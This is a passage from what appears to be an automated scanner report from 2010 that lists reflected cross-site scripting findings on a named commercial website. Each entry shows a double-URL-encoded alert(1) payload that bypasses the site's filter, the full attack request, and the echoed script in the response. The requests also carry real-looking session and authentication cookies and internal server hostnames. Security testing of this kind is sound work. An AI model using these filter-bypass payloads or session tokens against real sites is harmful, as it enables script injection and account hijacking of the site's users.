This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochureedcd5%2522%253balert%25281%2529%252f%252f3c310134b3c/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:22 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochureedcd5";alert(1)//3c310134b3c/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.289. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a41ae%2522%253balert%25281%2529%252f%252f9a1a2a67ead was submitted in the REST URL parameter 6. This input was echoed as a41ae";alert(1)//9a1a2a67ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochure/1a41ae%2522%253balert%25281%2529%252f%252f9a1a2a67ead/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:26 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochure/1a41ae";alert(1)//9a1a2a67ead/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.290. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8b5%2522%253balert%25281%2529%252f%252f11678d7b36 was submitted in the REST URL parameter 7. This input was echoed as be8b5";alert(1)//11678d7b36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochure/1/be8b5%2522%253balert%25281%2529%252f%252f11678d7b36/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochure/1/be8b5";alert(1)//11678d7b36/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.291. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 155f6%2522%253balert%25281%2529%252f%252fe68f3e92fba was submitted in the REST URL parameter 1. This input was echoed as 155f6";alert(1)//e68f3e92fba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc155f6%2522%253balert%25281%2529%252f%252fe68f3e92fba/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:10 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc155f6";alert(1)//e68f3e92fba/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.292. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7dc%2522%253balert%25281%2529%252f%252f80d9c49c2e9 was submitted in the REST URL parameter 2. This input was echoed as ad7dc";alert(1)//80d9c49c2e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibad7dc%2522%253balert%25281%2529%252f%252f80d9c49c2e9/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibad7dc";alert(1)//80d9c49c2e9/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.293. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

